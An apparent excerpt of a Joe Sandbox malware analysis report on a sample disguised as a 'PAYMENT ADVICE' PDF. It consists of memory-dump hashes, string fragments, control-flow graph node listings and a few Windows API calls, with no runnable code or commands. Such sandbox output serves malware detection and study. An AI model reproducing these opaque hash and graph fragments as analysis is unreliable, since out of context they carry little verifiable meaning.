                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^O7
                                                                                                                • API String ID: 0-2014433986
                                                                                                                • Opcode ID: f2e896a73cff854436ff08a2d6d680ad34497e509652c1b0ceec554695f98f95
                                                                                                                • Instruction ID: 1545e016f5e873196df2ba4c62d0bc01c37ab788641a8f86cf7023f854e9fa7c
                                                                                                                • Opcode Fuzzy Hash: f2e896a73cff854436ff08a2d6d680ad34497e509652c1b0ceec554695f98f95
                                                                                                                • Instruction Fuzzy Hash: AAA190B5E052289FEB18CF6AC944B9DFBF2AF89300F14C0AAD418B7251DB745A85CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^O7
                                                                                                                • API String ID: 0-2014433986
                                                                                                                • Opcode ID: 6c51f303314ae6901b1a4e80c774fee4747d1c303c1d8818c5a7348e5a6a0b0c
                                                                                                                • Instruction ID: 2a8cab2bd227341368e028cfbc517233019a96c2ff58d0108bd683697ae9f28b
                                                                                                                • Opcode Fuzzy Hash: 6c51f303314ae6901b1a4e80c774fee4747d1c303c1d8818c5a7348e5a6a0b0c
                                                                                                                • Instruction Fuzzy Hash: DDA192B5E016189FEB18CF6AC984B9DFBF2AF89300F14C1AAD408B7255DB345A85CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^O7
                                                                                                                • API String ID: 0-2014433986
                                                                                                                • Opcode ID: 745ebb6489a56d00a48b0f64454f68b302d6ba31d2e80294c6f780dcd5d3a81d
                                                                                                                • Instruction ID: e0fefaaa23be80f2b250131412410a26af6f658f40d40038c6c34d9b521c3317
                                                                                                                • Opcode Fuzzy Hash: 745ebb6489a56d00a48b0f64454f68b302d6ba31d2e80294c6f780dcd5d3a81d
                                                                                                                • Instruction Fuzzy Hash: 85A191B4E052289FEB14CF6AC944B9DFBF2AB89300F14C1AAD408B7251DB345A85CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^O7
                                                                                                                • API String ID: 0-2014433986
                                                                                                                • Opcode ID: 335b859336c9166d93465674276c23ae876cb77d74c055adf6a5870170c9ad57
                                                                                                                • Instruction ID: 32776a05c365577114b10f876f77ce07b4a34699fdd59c581acbf3aa01c1f1ca
                                                                                                                • Opcode Fuzzy Hash: 335b859336c9166d93465674276c23ae876cb77d74c055adf6a5870170c9ad57
                                                                                                                • Instruction Fuzzy Hash: 4DA182B5E012289FEB14CF6AC984B9DFBF2AF89300F14C1AAD408B7255DB345A85CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^O7
                                                                                                                • API String ID: 0-2014433986
                                                                                                                • Opcode ID: 8e414d40faecbeea607d7b1ce831182197341b1934aec13aebec63ebd07d1fd0
                                                                                                                • Instruction ID: af38e4b4a239bf3c23f68c19388652682215f2f8079b6a529ac707ad20fd9888
                                                                                                                • Opcode Fuzzy Hash: 8e414d40faecbeea607d7b1ce831182197341b1934aec13aebec63ebd07d1fd0
                                                                                                                • Instruction Fuzzy Hash: 617183B5E016288FEB58CF66C944B9AFBF2AF88300F14C1AAD40DA7255DB345A85CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^O7
                                                                                                                • API String ID: 0-2014433986
                                                                                                                • Opcode ID: c3c87d7fd43550b92bffa4e452ddd085659220733bae8c7ec6918c62974d5041
                                                                                                                • Instruction ID: 3be8ac4d8b4aa1b68a51aadc58e522eaa35aa5fad9b9439218b5f88ed0ad1fd0
                                                                                                                • Opcode Fuzzy Hash: c3c87d7fd43550b92bffa4e452ddd085659220733bae8c7ec6918c62974d5041
                                                                                                                • Instruction Fuzzy Hash: A17184B4E016188FEB68CF66C944B9DFAF2AF89300F14C1AAD40CB7255DB345A85CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6f7c34cc683b4a9a567fa68c7790900a5e35664ef4e5eafcf3c993058cf426b9
                                                                                                                • Instruction ID: 36adf545f542b0782278a42b4c2f1ed29a5b288886fc14205f71f75d3cc32f87
                                                                                                                • Opcode Fuzzy Hash: 6f7c34cc683b4a9a567fa68c7790900a5e35664ef4e5eafcf3c993058cf426b9
                                                                                                                • Instruction Fuzzy Hash: 5072B1B4E152688FDB64DF69C980BDDBBB2BB49300F1091E9D818A7355DB34AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d4a810f12b14923e1441a88fca89257afe00d4eb2fd789fb3a0a624d3f8e69b
                                                                                                                • Instruction ID: d076d5b1397df47ab54ef7b40e8ea0865aa48dd980f19edf1799578b22a98cd9
                                                                                                                • Opcode Fuzzy Hash: 2d4a810f12b14923e1441a88fca89257afe00d4eb2fd789fb3a0a624d3f8e69b
                                                                                                                • Instruction Fuzzy Hash: 73D1DFB4E01258CFDB15CFA4C984BDDBBB2BF89305F2081A9D409AB391DB356A85CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ab40702493af19487ab385d8ec40bba430c39e225aa2c47d67f36620ebb7d8c
                                                                                                                • Instruction ID: 6c6e07c26fd03043dac35211fe2e8b58ab91d85481aba0b6add8f171fe324378
                                                                                                                • Opcode Fuzzy Hash: 4ab40702493af19487ab385d8ec40bba430c39e225aa2c47d67f36620ebb7d8c
                                                                                                                • Instruction Fuzzy Hash: 53C1BF78E10258CFDB54DFA5C954B9DBBB2FB88305F2080A9D809BB355DB355A81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 229a7cb49910d0fb0928827197bdbab17c691ddfaad8e836674adf7b03b23506
                                                                                                                • Instruction ID: 4eef137a47d8f10592ac018407b55b69fd9db79cd676dbf9da28afadf9bb6e09
                                                                                                                • Opcode Fuzzy Hash: 229a7cb49910d0fb0928827197bdbab17c691ddfaad8e836674adf7b03b23506
                                                                                                                • Instruction Fuzzy Hash: ABA104B49002088FEB14DFA9C844BDDBBB1FF88315F208269E418A72A1DB75A985CF54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 92eb993fcfb69a9aea700f9b40e9effd72b1c8124de69305d760e465e5771ec6
                                                                                                                • Instruction ID: 910bdccd74e0c4ef8e50d927f3a487089a5471adfb781f0fb95ba61def3599d2
                                                                                                                • Opcode Fuzzy Hash: 92eb993fcfb69a9aea700f9b40e9effd72b1c8124de69305d760e465e5771ec6
                                                                                                                • Instruction Fuzzy Hash: 38A1F3B4D002088FEB14DFA9C584BDDBBB1FF89315F208269E418A73A1DB75A985CF54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cc00fb707024b32c9b7d8a887b1d772c685bace1096bc7c2b76dc9784f35f2a
                                                                                                                • Instruction ID: 644bedf442c39301f1afc38185f212c26746bfddd4095d9fbb75295777b76d05
                                                                                                                • Opcode Fuzzy Hash: 6cc00fb707024b32c9b7d8a887b1d772c685bace1096bc7c2b76dc9784f35f2a
                                                                                                                • Instruction Fuzzy Hash: 8A91F374900248CFEB10DFA8C984BDCBBB1FF49321F209269E419B72A1DB75A985CF54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d1f81ea27666ce0ea1f543ea354a105637bafa2d690f7f5fe0d25c09d816af87
                                                                                                                • Instruction ID: c7b22d2697a100034c35b1d5a8b5b0650608f8e8140a664aeb2da7b50541ed5b
                                                                                                                • Opcode Fuzzy Hash: d1f81ea27666ce0ea1f543ea354a105637bafa2d690f7f5fe0d25c09d816af87
                                                                                                                • Instruction Fuzzy Hash: 9981F4B4E01248DFDB04DFAAD95069DBBF2BF88310F24D529D824AB358DB359942CF90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fc7c80010793923b5d7b63efe4b7da2c3224086d39b7240b081592fafce73443
                                                                                                                • Instruction ID: 13cf1402dba900f9229c7184544191e0dd381c33af7e7bdfa21e251dcb674cd8
                                                                                                                • Opcode Fuzzy Hash: fc7c80010793923b5d7b63efe4b7da2c3224086d39b7240b081592fafce73443
                                                                                                                • Instruction Fuzzy Hash: 9671B6B5D05268CFDB64CF66D9847DDBBB2BF89301F1091AAD818B7264DB345A82CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c0b8d9911cbe5f047a735b65d3103e82136ffd9158fd2b4d391e8f5a72a9b57
                                                                                                                • Instruction ID: a6d461ea33fcce55949257ad4bd1747114e4c7e2ce1e0f0a14a926dbde5f7bc4
                                                                                                                • Opcode Fuzzy Hash: 8c0b8d9911cbe5f047a735b65d3103e82136ffd9158fd2b4d391e8f5a72a9b57
                                                                                                                • Instruction Fuzzy Hash: C76106B4A10259CFDB25DFA5D850FAEBBB2FB88304F1080A9990967755DB315E82DF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48d62ead9aed4464b2adcaa1c5941523bb9c6591d74ae23958c1c834037eb8f9
                                                                                                                • Instruction ID: d680261e57f0c3b48acfe73c3396ee13d8e6cba9f6be8e84b9a482685f0c39cc
                                                                                                                • Opcode Fuzzy Hash: 48d62ead9aed4464b2adcaa1c5941523bb9c6591d74ae23958c1c834037eb8f9
                                                                                                                • Instruction Fuzzy Hash: 89611AB4A10298CFDB26DFB5D854BADBBB2FB88300F10849A990A77354CB755D82DF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 738562604746de704c280911780cde69acf637413583eecc0925ffa439f31d5d
                                                                                                                • Instruction ID: 62a51ce84ad819d061d3970a4f4df11741957ec7409d4a3bdecf63e0c38851ac
                                                                                                                • Opcode Fuzzy Hash: 738562604746de704c280911780cde69acf637413583eecc0925ffa439f31d5d
                                                                                                                • Instruction Fuzzy Hash: 79415CB1E016189BEB58CF6BDD457CAFAF3AFC9310F14C1AAC50CA6264DB740A858F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 21491a92f93cef7bff1175bc7e47e0760ff0382bdfd85e85417e00e9b82b4c4d
                                                                                                                • Instruction ID: dd10cca4d6aeb26a79d5424cef0cf508b0160bd826612a564a01adf1a2070215
                                                                                                                • Opcode Fuzzy Hash: 21491a92f93cef7bff1175bc7e47e0760ff0382bdfd85e85417e00e9b82b4c4d
                                                                                                                • Instruction Fuzzy Hash: 38416BB1E016189BEB58CF6BCD457CAFAF3AFC9310F04C1AAD50CA6264DB740A858F51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 1566b8-1566ed 1 1566f3-156716 0->1 2 156b1c-156b20 0->2 11 1567c4-1567c8 1->11 12 15671c-156729 1->12 3 156b22-156b36 2->3 4 156b39-156b47 2->4 9 156b49-156b5e 4->9 10 156bb8-156bcd 4->10 20 156b65-156b72 9->20 21 156b60-156b63 9->21 22 156bd4-156be1 10->22 23 156bcf-156bd2 10->23 13 156810-156819 11->13 14 1567ca-1567d8 11->14 28 156738 12->28 29 15672b-156736 12->29 17 156c2f 13->17 18 15681f-156829 13->18 14->13 36 1567da-1567f5 14->36 30 156c34-156c64 17->30 18->2 26 15682f-156838 18->26 24 156b74-156bb5 20->24 21->24 25 156be3-156c1e 22->25 23->25 78 156c25-156c2c 25->78 34 156847-156853 26->34 35 15683a-15683f 26->35 31 15673a-15673c 28->31 29->31 63 156c66-156c7c 30->63 64 156c7d-156c84 30->64 31->11 37 156742-1567a4 31->37 34->30 40 156859-15685f 34->40 35->34 59 1567f7-156801 36->59 60 156803 36->60 89 1567a6 37->89 90 1567aa-1567c1 37->90 43 156865-156875 40->43 44 156b06-156b0a 40->44 57 156877-156887 43->57 58 156889-15688b 43->58 44->17 48 156b10-156b16 44->48 48->2 48->26 61 15688e-156894 57->61 58->61 62 156805-156807 59->62 60->62 61->44 65 15689a-1568a9 61->65 62->13 66 156809 62->66 72 156957-156982 call 156500 * 2 65->72 73 1568af 65->73 66->13 91 156a6c-156a86 72->91 92 156988-15698c 72->92 76 1568b2-1568c3 73->76 76->30 80 1568c9-1568db 76->80 80->30 82 1568e1-1568f9 80->82 145 1568fb call 156c98 82->145 146 1568fb call 156c88 82->146 85 156901-156911 85->44 88 156917-15691a 85->88 93 156924-156927 88->93 94 15691c-156922 88->94 89->90 90->11 91->2 114 156a8c-156a90 91->114 92->44 96 156992-156996 92->96 93->17 97 15692d-156930 93->97 94->93 94->97 99 1569be-1569c4 96->99 100 156998-1569a5 96->100 101 156932-156936 97->101 102 156938-15693b 97->102 103 1569c6-1569ca 99->103 104 1569ff-156a05 99->104 117 1569b4 100->117 118 1569a7-1569b2 100->118 101->102 105 156941-156945 101->105 102->17 102->105 103->104 106 1569cc-1569d5 103->106 107 156a07-156a0b 104->107 108 156a11-156a17 104->108 105->17 111 15694b-156951 105->111 112 1569e4-1569fa 106->112 113 1569d7-1569dc 106->113 107->78 107->108 115 156a23-156a25 108->115 116 156a19-156a1d 108->116 111->72 111->76 112->44 113->112 120 156a92-156a9c call 1553a8 114->120 121 156acc-156ad0 114->121 122 156a27-156a30 115->122 123 156a5a-156a5c 115->123 116->44 116->115 119 1569b6-1569b8 117->119 118->119 119->44 119->99 120->121 134 156a9e-156ab3 120->134 121->78 126 156ad6-156ada 121->126 129 156a32-156a37 122->129 130 156a3f-156a55 122->130 123->44 124 156a62-156a69 123->124 126->78 131 156ae0-156aed 126->131 129->130 130->44 137 156afc 131->137 138 156aef-156afa 131->138 134->121 142 156ab5-156aca 134->142 139 156afe-156b00 137->139 138->139 139->44 139->78 142->2 142->121 145->85 146->85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (otq$(otq$(otq$(otq$(otq$(otq$,xq$,xq
                                                                                                                • API String ID: 0-3864058770
                                                                                                                • Opcode ID: f6125d06bff28be7a883274246dcc8228f498ff7dc855883afa41eea3850d2ec
                                                                                                                • Instruction ID: b6738756dfc164e52775da2b664596597b76b10a5adcf91150cf4166b4fbe4ed
                                                                                                                • Opcode Fuzzy Hash: f6125d06bff28be7a883274246dcc8228f498ff7dc855883afa41eea3850d2ec
                                                                                                                • Instruction Fuzzy Hash: 90125630A00209DFCB14CF69D984AAEBBF2FF48315F558559E86ADB261DB30ED45CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 684 37fb0980-37fb0a0f GetCurrentProcess 688 37fb0a18-37fb0a4c GetCurrentThread 684->688 689 37fb0a11-37fb0a17 684->689 690 37fb0a4e-37fb0a54 688->690 691 37fb0a55-37fb0a89 GetCurrentProcess 688->691 689->688 690->691 693 37fb0a8b-37fb0a91 691->693 694 37fb0a92-37fb0aaa 691->694 693->694 705 37fb0aad call 37fb0b4f 694->705 706 37fb0aad call 37fb0f31 694->706 697 37fb0ab3-37fb0ae2 GetCurrentThreadId 698 37fb0aeb-37fb0b4d 697->698 699 37fb0ae4-37fb0aea 697->699 699->698 705->697 706->697
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 37FB09FE
                                                                                                                • GetCurrentThread.KERNEL32 ref: 37FB0A3B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 37FB0A78
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 37FB0AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 0ed348eedc4117a287c50a58bf679f7d6bacccb14b623478583b110713b3f8f2
                                                                                                                • Instruction ID: 8ba368223177d8bdba3b74d3a3a5b92a384c702810bf6262340fdc021a75184d
                                                                                                                • Opcode Fuzzy Hash: 0ed348eedc4117a287c50a58bf679f7d6bacccb14b623478583b110713b3f8f2
                                                                                                                • Instruction Fuzzy Hash: 305155B0900649DFDB14CFAAC548BDEBBF5FF88310F248859E419A7251DB35A980CF65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 707 1519b8-151a13 711 151a35-151a84 707->711 712 151a15-151a34 707->712 716 151a86-151a8d 711->716 717 151a9f 711->717 718 151a96-151a9d 716->718 719 151a8f-151a94 716->719 721 151aa7 717->721 720 151aaa-151abe 718->720 719->720 723 151ad4-151adc 720->723 724 151ac0-151ac7 720->724 721->720 727 151ade-151ae2 723->727 725 151acd-151ad2 724->725 726 151ac9-151acb 724->726 725->727 726->727 729 151ae4-151af9 727->729 730 151b42-151b45 727->730 729->730 738 151afb-151afe 729->738 731 151b47-151b5c 730->731 732 151b8d-151b93 730->732 731->732 742 151b5e-151b62 731->742 733 15268e 732->733 734 151b99-151b9b 732->734 739 152693-152c75 733->739 734->733 736 151ba1-151ba6 734->736 740 15263c-152640 736->740 741 151bac 736->741 743 151b00-151b02 738->743 744 151b1d-151b3b call 1502a8 738->744 746 152647-15268d 740->746 747 152642-152645 740->747 741->740 748 151b64-151b68 742->748 749 151b6a-151b88 call 1502a8 742->749 743->744 750 151b04-151b07 743->750 744->730 747->739 747->746 748->732 748->749 749->732 750->730 754 151b09-151b1b 750->754 754->730 754->744
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Xxq$Xxq$Xxq$Xxq
                                                                                                                • API String ID: 0-3587233187
                                                                                                                • Opcode ID: bbb51ee4825f010e969893449ba7d89ca9bc628fd115cbdcfe9c03cd7ff03196
                                                                                                                • Instruction ID: 66b12033b67ae47dd85df2564bce6a5cf1a5697c4f251c46b798580df943f219
                                                                                                                • Opcode Fuzzy Hash: bbb51ee4825f010e969893449ba7d89ca9bc628fd115cbdcfe9c03cd7ff03196
                                                                                                                • Instruction Fuzzy Hash: FA32A7DBD1D7E18BC7134B705CB8259BFB16A22106BEF458EC8C297287EBA94485C353

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 864 37a8d548-37a8d66d 883 37a8d710-37a8d741 call 37a8dd21 864->883 884 37a8d673-37a8d6b9 864->884 891 37a8d747-37a8d75e 883->891 889 37a8d6bb-37a8d6bf 884->889 890 37a8d6c4-37a8d70f 884->890 889->890
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'tq$4'tq$drO7$)P7
                                                                                                                • API String ID: 0-792904751
                                                                                                                • Opcode ID: 2031730199d8fd85f5995d64b29353675059e7f4af91e61c9ac9a6abc770422b
                                                                                                                • Instruction ID: cdf9d1de01845f9885497d4932de816cd68536f1386f8e3a0b6f8e4414efc6ed
                                                                                                                • Opcode Fuzzy Hash: 2031730199d8fd85f5995d64b29353675059e7f4af91e61c9ac9a6abc770422b
                                                                                                                • Instruction Fuzzy Hash: 235194B0A0024A9FCF05EFA5D891ADEBBB2FF89300F104569E405BB256DB31AD41CF91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 960 37a87920-37a87941 961 37a87948-37a8797e 960->961 962 37a87943 960->962 965 37a87987-37a879ae 961->965 962->961 967 37a87b3d-37a87b46 965->967 968 37a879b4-37a879cc 965->968 971 37a87ae8-37a87b03 968->971 973 37a87b09-37a87b2d 971->973 974 37a879d1-37a87ae7 971->974 973->967 974->971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <CO7$<CO7$<CO7
                                                                                                                • API String ID: 0-2732084035
                                                                                                                • Opcode ID: f7c57b8791df3268821c0adfe4ef49fdca0092be74d2c265bd036d2792659d5e
                                                                                                                • Instruction ID: aae28d1ccc2ad5f2551f0c8647a620c991c420ab217c3725cfd2b8acaaec610e
                                                                                                                • Opcode Fuzzy Hash: f7c57b8791df3268821c0adfe4ef49fdca0092be74d2c265bd036d2792659d5e
                                                                                                                • Instruction Fuzzy Hash: 7951F1B4D01218DFDB15DFE5D894AADBBB2FF88300F608129D805AB355DB756A86CF40

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
